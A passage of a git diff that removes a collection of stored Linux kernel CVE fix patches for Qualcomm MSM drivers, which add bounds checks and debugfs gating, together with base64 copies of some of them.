--		}
--		break;
--
--	case MSM_BUSPM_IOC_WRBUF:
--		pr_debug("Write Buffer\n");
--
--		if (!buf) {
--			retval = -EINVAL;
--			break;
--		}
--
--		if (copy_from_user(&xfer, (void __user *)arg, sizeof(xfer))) {
--			retval = -EFAULT;
--			break;
--		}
--
--		if ((buflen <= xfer.size) &&
--			(copy_from_user(buf, (void __user *)xfer.data,
--			xfer.size))) {
--			retval = -EFAULT;
--			break;
--		}
--		break;
--
--	case MSM_BUSPM_IOC_CMD:
--		pr_debug("IOCTL command: cmd: %d arg: %lu\n", cmd, arg);
--		retval = msm_buspm_ioc_cmds(arg);
--		break;
--
--	default:
--		pr_debug("Unknown command 0x%x\n", cmd);
--		retval = -EINVAL;
--		break;
--	}
--
--	return retval;
--}
--
--static int msm_buspm_dev_release(struct inode *inode, struct file *filp)
--{
--	struct msm_buspm_map_dev *dev = filp->private_data;
--
--	msm_buspm_dev_free(filp);
--	kfree(dev);
--	filp->private_data = NULL;
--
--	return 0;
--}
--
--static int msm_buspm_dev_mmap(struct file *filp, struct vm_area_struct *vma)
--{
--	pr_debug("vma = 0x%p\n", vma);
--
--	/* Mappings are uncached */
--	vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
--	if (remap_pfn_range(vma, vma->vm_start, vma->vm_pgoff,
--		vma->vm_end - vma->vm_start, vma->vm_page_prot))
--		return -EFAULT;
--
--	return 0;
--}
--
--#ifdef CONFIG_COMPAT
--static long
--msm_buspm_dev_compat_ioctl(struct file *filp, unsigned int cmd,
--						unsigned long arg)
--{
--	return msm_buspm_dev_ioctl(filp, cmd, (unsigned long)compat_ptr(arg));
--}
--#endif
--
--static int __init msm_buspm_dev_init(void)
--{
--	int ret = 0;
--
--	ret = misc_register(&msm_buspm_misc);
--	if (ret < 0) {
--		WARN_ON(1);
--		return ret;
--	}
--
--	if (msm_buspm_misc.this_device->coherent_dma_mask == 0)
--		msm_buspm_misc.this_device->coherent_dma_mask =
--							DMA_BIT_MASK(32);
--
--	return ret;
--}
--
--static void __exit msm_buspm_dev_exit(void)
--{
--	misc_deregister(&msm_buspm_misc);
--}
--module_init(msm_buspm_dev_init);
--module_exit(msm_buspm_dev_exit);
--
--MODULE_LICENSE("GPL v2");
--MODULE_VERSION("1.0");
--MODULE_ALIAS("platform:"MSM_BUSPM_DRV_NAME);
-diff --git a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-index 9aec824..00b6e9a3 100644
---- a/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-+++ b/drivers/platform/msm/msm_bus/msm_buspm_coresight_adhoc.c
-@@ -135,6 +135,7 @@ int msmbus_coresight_init_adhoc(struct platform_device *pdev,
- 		return PTR_ERR(pdata);
- 
- 	drvdata = platform_get_drvdata(pdev);
-+	dev_info(dev, "info: removed buspm module from kernel space\n");
- 	if (IS_ERR_OR_NULL(drvdata)) {
- 		drvdata = devm_kzalloc(dev, sizeof(*drvdata), GFP_KERNEL);
- 		if (!drvdata) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch
deleted file mode 100644
index d641d536..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-diff --git a/drivers/video/msm/Kconfig b/drivers/video/msm/Kconfig
-index 590723a..30ce98f 100644
---- a/drivers/video/msm/Kconfig
-+++ b/drivers/video/msm/Kconfig
-@@ -44,6 +44,11 @@
- config FB_MSM_MDSS_COMMON
- 	bool
- 
-+config MDP_DEBUG_FS
-+	depends on DEBUG_FS
-+	bool "MDP Debug FS"
-+	default n
-+
- choice
- 	prompt "MDP HW version"
- 	default FB_MSM_MDP22
-diff --git a/drivers/video/msm/Makefile b/drivers/video/msm/Makefile
-index 67c6b48..d26fe58 100644
---- a/drivers/video/msm/Makefile
-+++ b/drivers/video/msm/Makefile
-@@ -9,8 +9,7 @@
- ifeq ($(CONFIG_FB_MSM_MDP_HW),y)
- # MDP
- obj-y += mdp.o
--
--obj-$(CONFIG_DEBUG_FS) += mdp_debugfs.o
-+obj-$(CONFIG_MDP_DEBUG_FS) += mdp_debugfs.o
- 
- ifeq ($(CONFIG_FB_MSM_MDP40),y)
- obj-y += mdp4_util.o
-diff --git a/drivers/video/msm/mdp.c b/drivers/video/msm/mdp.c
-index 7d6d448..7a59d51 100644
---- a/drivers/video/msm/mdp.c
-+++ b/drivers/video/msm/mdp.c
-@@ -2,7 +2,7 @@
-  *
-  * MSM MDP Interface (used by framebuffer core)
-  *
-- * Copyright (c) 2007-2012, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2007-2013, 2016 The Linux Foundation. All rights reserved.
-  * Copyright (C) 2007 Google Incorporated
-  *
-  * This software is licensed under the terms of the GNU General Public
-@@ -3257,7 +3257,7 @@
- 		return ret;
- 	}
- 
--#if defined(CONFIG_DEBUG_FS)
-+#if defined(CONFIG_MDP_DEBUG_FS)
- 	mdp_debugfs_init();
- #endif
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch.base64
deleted file mode 100644
index ccc8c519..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2443/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2RyaXZlcnMvdmlkZW8vbXNtL0tjb25maWcgYi9kcml2ZXJzL3ZpZGVvL21zbS9LY29uZmlnCmluZGV4IDU5MDcyM2EuLjMwY2U5OGYgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvdmlkZW8vbXNtL0tjb25maWcKKysrIGIvZHJpdmVycy92aWRlby9tc20vS2NvbmZpZwpAQCAtNDQsNiArNDQsMTEgQEAKIGNvbmZpZyBGQl9NU01fTURTU19DT01NT04KIAlib29sCiAKK2NvbmZpZyBNRFBfREVCVUdfRlMKKwlkZXBlbmRzIG9uIERFQlVHX0ZTCisJYm9vbCAiTURQIERlYnVnIEZTIgorCWRlZmF1bHQgbgorCiBjaG9pY2UKIAlwcm9tcHQgIk1EUCBIVyB2ZXJzaW9uIgogCWRlZmF1bHQgRkJfTVNNX01EUDIyCmRpZmYgLS1naXQgYS9kcml2ZXJzL3ZpZGVvL21zbS9NYWtlZmlsZSBiL2RyaXZlcnMvdmlkZW8vbXNtL01ha2VmaWxlCmluZGV4IDY3YzZiNDguLmQyNmZlNTggMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvdmlkZW8vbXNtL01ha2VmaWxlCisrKyBiL2RyaXZlcnMvdmlkZW8vbXNtL01ha2VmaWxlCkBAIC05LDggKzksNyBAQAogaWZlcSAoJChDT05GSUdfRkJfTVNNX01EUF9IVykseSkKICMgTURQCiBvYmoteSArPSBtZHAubwotCi1vYmotJChDT05GSUdfREVCVUdfRlMpICs9IG1kcF9kZWJ1Z2ZzLm8KK29iai0kKENPTkZJR19NRFBfREVCVUdfRlMpICs9IG1kcF9kZWJ1Z2ZzLm8KIAogaWZlcSAoJChDT05GSUdfRkJfTVNNX01EUDQwKSx5KQogb2JqLXkgKz0gbWRwNF91dGlsLm8KZGlmZiAtLWdpdCBhL2RyaXZlcnMvdmlkZW8vbXNtL21kcC5jIGIvZHJpdmVycy92aWRlby9tc20vbWRwLmMKaW5kZXggN2Q2ZDQ0OC4uN2E1OWQ1MSAxMDA2NDQKLS0tIGEvZHJpdmVycy92aWRlby9tc20vbWRwLmMKKysrIGIvZHJpdmVycy92aWRlby9tc20vbWRwLmMKQEAgLTIsNyArMiw3IEBACiAgKgogICogTVNNIE1EUCBJbnRlcmZhY2UgKHVzZWQgYnkgZnJhbWVidWZmZXIgY29yZSkKICAqCi0gKiBDb3B5cmlnaHQgKGMpIDIwMDctMjAxMiwgVGhlIExpbnV4IEZvdW5kYXRpb24uIEFsbCByaWdodHMgcmVzZXJ2ZWQuCisgKiBDb3B5cmlnaHQgKGMpIDIwMDctMjAxMywgMjAxNiBUaGUgTGludXggRm91bmRhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC4KICAqIENvcHlyaWdodCAoQykgMjAwNyBHb29nbGUgSW5jb3Jwb3JhdGVkCiAgKgogICogVGhpcyBzb2Z0d2FyZSBpcyBsaWNlbnNlZCB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYwpAQCAtMzI1Nyw3ICszMjU3LDcgQEAKIAkJcmV0dXJuIHJldDsKIAl9CiAKLSNpZiBkZWZpbmVkKENPTkZJR19ERUJVR19GUykKKyNpZiBkZWZpbmVkKENPTkZJR19NRFBfREVCVUdfRlMpCiAJbWRwX2RlYnVnZnNfaW5pdCgpOwogI2VuZGlmCiAK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2465/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-2465/3.10/0001.patch
deleted file mode 100644
index 8c7ea9e4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2465/3.10/0001.patch
+++ /dev/null
@@ -1,173 +0,0 @@
-From 09dc4abecb0da388aedb37a57889c1ce2b267807 Mon Sep 17 00:00:00 2001
-From: Veera Sundaram Sankaran <veeras@codeaurora.org>
-Date: Tue, 15 Mar 2016 18:42:27 -0700
-Subject: msm: mdss: fix possible out-of-bounds and overflow issue in mdp
- debugfs
-
-There are few cases where the count argument passed by the user
-space is not validated, which can potentially lead to out of bounds
-or overflow issues. In some cases, kernel might copy more data than
-what is requested. Add necessary checks to avoid such cases.
-
-Change-Id: Ifa42fbd475665a0ca581c907ce5432584ea0e7ed
-Signed-off-by: Veera Sundaram Sankaran <veeras@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c | 44 +++++++++++++++++++++----------------
- 1 file changed, 25 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index 12415c2..1d214ca 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2009-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -109,10 +109,10 @@ static ssize_t panel_debug_base_offset_read(struct file *file,
- 		return 0;	/* the end */
- 
- 	len = snprintf(buf, sizeof(buf), "0x%02zx %zx\n", dbg->off, dbg->cnt);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -231,10 +231,11 @@ static ssize_t panel_debug_base_reg_read(struct file *file,
- 	if (mdata->debug_inf.debug_enable_clock)
- 		mdata->debug_inf.debug_enable_clock(0);
- 
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(to_user_buf))
- 		return 0;
- 
--	if (copy_to_user(user_buf, to_user_buf, len))
-+	if ((count < sizeof(to_user_buf))
-+			|| copy_to_user(user_buf, to_user_buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -368,7 +369,7 @@ static ssize_t mdss_debug_base_offset_read(struct file *file,
- {
- 	struct mdss_debug_base *dbg = file->private_data;
- 	int len = 0;
--	char buf[24];
-+	char buf[24] = {'\0'};
- 
- 	if (!dbg)
- 		return -ENODEV;
-@@ -377,10 +378,10 @@ static ssize_t mdss_debug_base_offset_read(struct file *file,
- 		return 0;	/* the end */
- 
- 	len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -702,7 +703,7 @@ static ssize_t mdss_debug_factor_read(struct file *file,
- {
- 	struct mdss_fudge_factor *factor = file->private_data;
- 	int len = 0;
--	char buf[32];
-+	char buf[32] = {'\0'};
- 
- 	if (!factor)
- 		return -ENODEV;
-@@ -712,10 +713,10 @@ static ssize_t mdss_debug_factor_read(struct file *file,
- 
- 	len = snprintf(buf, sizeof(buf), "%d/%d\n",
- 			factor->numer, factor->denom);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -746,6 +747,8 @@ static ssize_t mdss_debug_perf_mode_write(struct file *file,
- 	if (copy_from_user(buf, user_buf, count))
- 		return -EFAULT;
- 
-+	buf[count] = 0;	/* end of string */
-+
- 	if (sscanf(buf, "%d", &perf_mode) != 1)
- 		return -EFAULT;
- 
-@@ -766,7 +769,7 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file,
- {
- 	struct mdss_perf_tune *perf_tune = file->private_data;
- 	int len = 0;
--	char buf[40];
-+	char buf[40] = {'\0'};
- 
- 	if (!perf_tune)
- 		return -ENODEV;
-@@ -774,14 +777,12 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file,
- 	if (*ppos)
- 		return 0;	/* the end */
- 
--	buf[count] = 0;
--
- 	len = snprintf(buf, sizeof(buf), "min_mdp_clk %lu min_bus_vote %llu\n",
- 	perf_tune->min_mdp_clk, perf_tune->min_bus_vote);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;   /* increase offset */
-@@ -801,7 +802,7 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file,
- {
- 	struct mdss_data_type *mdata = file->private_data;
- 	int len = 0;
--	char buf[40];
-+	char buf[40] = {'\0'};
- 
- 	if (!mdata)
- 		return -ENODEV;
-@@ -811,10 +812,10 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file,
- 
- 	len = snprintf(buf, sizeof(buf), "%d\n",
- 		!mdata->has_panic_ctrl);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;   /* increase offset */
-@@ -877,9 +878,14 @@ static ssize_t mdss_debug_perf_panic_write(struct file *file,
- 	if (!mdata)
- 		return -EFAULT;
- 
-+	if (count >= sizeof(buf))
-+		return -EFAULT;
-+
- 	if (copy_from_user(buf, user_buf, count))
- 		return -EFAULT;
- 
-+	buf[count] = 0;	/* end of string */
-+
- 	if (sscanf(buf, "%d", &disable_panic) != 1)
- 		return -EFAULT;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2465/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-2465/3.18/0002.patch
deleted file mode 100644
index 1af62167..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2465/3.18/0002.patch
+++ /dev/null
@@ -1,178 +0,0 @@
-From 240f3bd82840fe6df7989339e465e9558f42fb85 Mon Sep 17 00:00:00 2001
-From: Veera Sundaram Sankaran <veeras@codeaurora.org>
-Date: Tue, 15 Mar 2016 18:42:27 -0700
-Subject: msm: mdss: fix possible out-of-bounds and overflow issue in mdp
- debugfs
-
-There are few cases where the count argument passed by the user
-space is not validated, which can potentially lead to out of bounds
-or overflow issues. In some cases, kernel might copy more data than
-what is requested. Add necessary checks to avoid such cases.
-
-Change-Id: Ifa42fbd475665a0ca581c907ce5432584ea0e7ed
-[veeras@codeaurora.org: Resolve conflicts in mdss_debug.c]
-Signed-off-by: Veera Sundaram Sankaran <veeras@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c | 47 +++++++++++++++++++++++--------------
- 1 file changed, 29 insertions(+), 18 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index e4749c5..09b0694 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -111,11 +111,11 @@ static ssize_t panel_debug_base_offset_read(struct file *file,
- 	if (*ppos)
- 		return 0;	/* the end */
- 
--	len = snprintf(buf, sizeof(buf), "0x%02zx %zd\n", dbg->off, dbg->cnt);
--	if (len < 0)
-+	len = snprintf(buf, sizeof(buf), "0x%02zx %zx\n", dbg->off, dbg->cnt);
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -244,7 +244,11 @@ static ssize_t panel_debug_base_reg_read(struct file *file,
- 	if (mdata->debug_inf.debug_enable_clock)
- 		mdata->debug_inf.debug_enable_clock(0);
- 
--	if (copy_to_user(user_buf, panel_reg_buf, len))
-+	if (len < 0 || len >= sizeof(panel_reg_buf))
-+		return 0;
-+
-+	if ((count < sizeof(panel_reg_buf))
-+			|| (copy_to_user(user_buf, panel_reg_buf, len)))
- 		goto read_reg_fail;
- 
- 	kfree(rx_buf);
-@@ -403,7 +407,7 @@ static ssize_t mdss_debug_base_offset_read(struct file *file,
- {
- 	struct mdss_debug_base *dbg = file->private_data;
- 	int len = 0;
--	char buf[24];
-+	char buf[24] = {'\0'};
- 
- 	if (!dbg)
- 		return -ENODEV;
-@@ -412,10 +416,10 @@ static ssize_t mdss_debug_base_offset_read(struct file *file,
- 		return 0;	/* the end */
- 
- 	len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -759,7 +763,7 @@ static ssize_t mdss_debug_factor_read(struct file *file,
- {
- 	struct mult_factor *factor = file->private_data;
- 	int len = 0;
--	char buf[32];
-+	char buf[32] = {'\0'};
- 
- 	if (!factor)
- 		return -ENODEV;
-@@ -769,10 +773,10 @@ static ssize_t mdss_debug_factor_read(struct file *file,
- 
- 	len = snprintf(buf, sizeof(buf), "%d/%d\n",
- 			factor->numer, factor->denom);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
-@@ -803,6 +807,8 @@ static ssize_t mdss_debug_perf_mode_write(struct file *file,
- 	if (copy_from_user(buf, user_buf, count))
- 		return -EFAULT;
- 
-+	buf[count] = 0;	/* end of string */
-+
- 	if (sscanf(buf, "%d", &perf_mode) != 1)
- 		return -EFAULT;
- 
-@@ -823,7 +829,7 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file,
- {
- 	struct mdss_perf_tune *perf_tune = file->private_data;
- 	int len = 0;
--	char buf[40];
-+	char buf[40] = {'\0'};
- 
- 	if (!perf_tune)
- 		return -ENODEV;
-@@ -833,10 +839,10 @@ static ssize_t mdss_debug_perf_mode_read(struct file *file,
- 
- 	len = snprintf(buf, sizeof(buf), "min_mdp_clk %lu min_bus_vote %llu\n",
- 	perf_tune->min_mdp_clk, perf_tune->min_bus_vote);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;   /* increase offset */
-@@ -856,7 +862,7 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file,
- {
- 	struct mdss_data_type *mdata = file->private_data;
- 	int len = 0;
--	char buf[40];
-+	char buf[40] = {'\0'};
- 
- 	if (!mdata)
- 		return -ENODEV;
-@@ -866,10 +872,10 @@ static ssize_t mdss_debug_perf_panic_read(struct file *file,
- 
- 	len = snprintf(buf, sizeof(buf), "%d\n",
- 		!mdata->has_panic_ctrl);
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;   /* increase offset */
-@@ -932,9 +938,14 @@ static ssize_t mdss_debug_perf_panic_write(struct file *file,
- 	if (!mdata)
- 		return -EFAULT;
- 
-+	if (count >= sizeof(buf))
-+		return -EFAULT;
-+
- 	if (copy_from_user(buf, user_buf, count))
- 		return -EFAULT;
- 
-+	buf[count] = 0;	/* end of string */
-+
- 	if (sscanf(buf, "%d", &disable_panic) != 1)
- 		return -EFAULT;
- 
-@@ -1004,10 +1015,10 @@ static ssize_t mdss_debug_perf_bw_limit_read(struct file *file,
- 		temp_settings++;
- 	}
- 
--	if (len < 0)
-+	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
--	if (copy_to_user(buff, buf, len))
-+	if ((count < sizeof(buf)) || copy_to_user(buff, buf, len))
- 		return -EFAULT;
- 
- 	*ppos += len;	/* increase offset */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch
deleted file mode 100644
index db760d4d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-diff --git a/sound/soc/msm/qdsp6v2/q6adm.c b/sound/soc/msm/qdsp6v2/q6adm.c
-index 08caf51..14565cc 100644
---- a/sound/soc/msm/qdsp6v2/q6adm.c
-+++ b/sound/soc/msm/qdsp6v2/q6adm.c
-@@ -508,9 +508,18 @@
- 		rc = -EINVAL;
- 		goto adm_get_param_return;
- 	}
--	if (params_data) {
-+	if ((params_data) &&
-+	    (ARRAY_SIZE(adm_get_parameters) > 0) &&
-+	    (ARRAY_SIZE(adm_get_parameters) >= 1+adm_get_parameters[0]) &&
-+	    (params_length/sizeof(int) >= adm_get_parameters[0])) {
- 		for (i = 0; i < adm_get_parameters[0]; i++)
- 			params_data[i] = adm_get_parameters[1+i];
-+	} else {
-+		pr_err("%s: Get param data not copied! get_param array size %zd, index %d, params array size %zd, index %d\n",
-+		__func__, ARRAY_SIZE(adm_get_parameters),
-+		(1+adm_get_parameters[0]),
-+		params_length/sizeof(int),
-+		adm_get_parameters[0]);
- 	}
- 	rc = 0;
- adm_get_param_return:
-@@ -799,17 +808,18 @@
- 					data->payload_size))
- 				break;
- 
--			if (payload[0] == 0) {
--				if (data->payload_size >
--				    (4 * sizeof(uint32_t))) {
--					adm_get_parameters[0] = payload[3];
-+			if ((payload[0] == 0) &&
-+			    (data->payload_size > (4 * sizeof(*payload))) &&
-+			    (data->payload_size/sizeof(*payload)-4 >= payload[3]) &&
-+			    (ARRAY_SIZE(adm_get_parameters) > 0) &&
-+			    (ARRAY_SIZE(adm_get_parameters)-1 >= payload[3])) {
-+			                adm_get_parameters[0] = payload[3];
- 					pr_debug("GET_PP PARAM:received parameter length: 0x%x\n",
- 						adm_get_parameters[0]);
- 					/* storing param size then params */
- 					for (i = 0; i < payload[3]; i++)
- 						adm_get_parameters[1+i] =
- 								payload[4+i];
--				}
- 			} else {
- 				adm_get_parameters[0] = -1;
- 				pr_err("%s: GET_PP_PARAMS failed, setting size to %d\n",
diff --git a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch.base64
deleted file mode 100644
index 63268956..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2466/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL3NvdW5kL3NvYy9tc20vcWRzcDZ2Mi9xNmFkbS5jIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YWRtLmMKaW5kZXggMDhjYWY1MS4uMTQ1NjVjYyAxMDA2NDQKLS0tIGEvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YWRtLmMKKysrIGIvc291bmQvc29jL21zbS9xZHNwNnYyL3E2YWRtLmMKQEAgLTUwOCw5ICs1MDgsMTggQEAKIAkJcmMgPSAtRUlOVkFMOwogCQlnb3RvIGFkbV9nZXRfcGFyYW1fcmV0dXJuOwogCX0KLQlpZiAocGFyYW1zX2RhdGEpIHsKKwlpZiAoKHBhcmFtc19kYXRhKSAmJgorCSAgICAoQVJSQVlfU0laRShhZG1fZ2V0X3BhcmFtZXRlcnMpID4gMCkgJiYKKwkgICAgKEFSUkFZX1NJWkUoYWRtX2dldF9wYXJhbWV0ZXJzKSA+PSAxK2FkbV9nZXRfcGFyYW1ldGVyc1swXSkgJiYKKwkgICAgKHBhcmFtc19sZW5ndGgvc2l6ZW9mKGludCkgPj0gYWRtX2dldF9wYXJhbWV0ZXJzWzBdKSkgewogCQlmb3IgKGkgPSAwOyBpIDwgYWRtX2dldF9wYXJhbWV0ZXJzWzBdOyBpKyspCiAJCQlwYXJhbXNfZGF0YVtpXSA9IGFkbV9nZXRfcGFyYW1ldGVyc1sxK2ldOworCX0gZWxzZSB7CisJCXByX2VycigiJXM6IEdldCBwYXJhbSBkYXRhIG5vdCBjb3BpZWQhIGdldF9wYXJhbSBhcnJheSBzaXplICV6ZCwgaW5kZXggJWQsIHBhcmFtcyBhcnJheSBzaXplICV6ZCwgaW5kZXggJWRcbiIsCisJCV9fZnVuY19fLCBBUlJBWV9TSVpFKGFkbV9nZXRfcGFyYW1ldGVycyksCisJCSgxK2FkbV9nZXRfcGFyYW1ldGVyc1swXSksCisJCXBhcmFtc19sZW5ndGgvc2l6ZW9mKGludCksCisJCWFkbV9nZXRfcGFyYW1ldGVyc1swXSk7CiAJfQogCXJjID0gMDsKIGFkbV9nZXRfcGFyYW1fcmV0dXJuOgpAQCAtNzk5LDE3ICs4MDgsMTggQEAKIAkJCQkJZGF0YS0+cGF5bG9hZF9zaXplKSkKIAkJCQlicmVhazsKIAotCQkJaWYgKHBheWxvYWRbMF0gPT0gMCkgewotCQkJCWlmIChkYXRhLT5wYXlsb2FkX3NpemUgPgotCQkJCSAgICAoNCAqIHNpemVvZih1aW50MzJfdCkpKSB7Ci0JCQkJCWFkbV9nZXRfcGFyYW1ldGVyc1swXSA9IHBheWxvYWRbM107CisJCQlpZiAoKHBheWxvYWRbMF0gPT0gMCkgJiYKKwkJCSAgICAoZGF0YS0+cGF5bG9hZF9zaXplID4gKDQgKiBzaXplb2YoKnBheWxvYWQpKSkgJiYKKwkJCSAgICAoZGF0YS0+cGF5bG9hZF9zaXplL3NpemVvZigqcGF5bG9hZCktNCA+PSBwYXlsb2FkWzNdKSAmJgorCQkJICAgIChBUlJBWV9TSVpFKGFkbV9nZXRfcGFyYW1ldGVycykgPiAwKSAmJgorCQkJICAgIChBUlJBWV9TSVpFKGFkbV9nZXRfcGFyYW1ldGVycyktMSA+PSBwYXlsb2FkWzNdKSkgeworCQkJICAgICAgICAgICAgICAgIGFkbV9nZXRfcGFyYW1ldGVyc1swXSA9IHBheWxvYWRbM107CiAJCQkJCXByX2RlYnVnKCJHRVRfUFAgUEFSQU06cmVjZWl2ZWQgcGFyYW1ldGVyIGxlbmd0aDogMHgleFxuIiwKIAkJCQkJCWFkbV9nZXRfcGFyYW1ldGVyc1swXSk7CiAJCQkJCS8qIHN0b3JpbmcgcGFyYW0gc2l6ZSB0aGVuIHBhcmFtcyAqLwogCQkJCQlmb3IgKGkgPSAwOyBpIDwgcGF5bG9hZFszXTsgaSsrKQogCQkJCQkJYWRtX2dldF9wYXJhbWV0ZXJzWzEraV0gPQogCQkJCQkJCQlwYXlsb2FkWzQraV07Ci0JCQkJfQogCQkJfSBlbHNlIHsKIAkJCQlhZG1fZ2V0X3BhcmFtZXRlcnNbMF0gPSAtMTsKIAkJCQlwcl9lcnIoIiVzOiBHRVRfUFBfUEFSQU1TIGZhaWxlZCwgc2V0dGluZyBzaXplIHRvICVkXG4iLAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-2467/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2467/ANY/0001.patch
deleted file mode 100644
index cb3ed542..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2467/ANY/0001.patch
+++ /dev/null
@@ -1,91 +0,0 @@
-From 38b6131d78cecec5d970230aeee3cef485103d82 Mon Sep 17 00:00:00 2001
-From: Fred Oh <fred@codeaurora.org>
-Date: Thu, 3 Oct 2013 20:03:38 -0700
-Subject: ASoC: msm: q6: check upper bounds when copy ac3 params
-
-Although AC3 maximum param size is fixed, better check upper bounds
-when copy user data. It might cause overflow, possibly cause memory
-corruption.
-
-Change-Id: Iaded762f774c608e48e685d92204fc7516aa3063
-Signed-off-by: Fred Oh <fred@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/msm-compr-q6-v2.c | 30 ++++++++++++++++++++++--------
- 1 file changed, 22 insertions(+), 8 deletions(-)
-
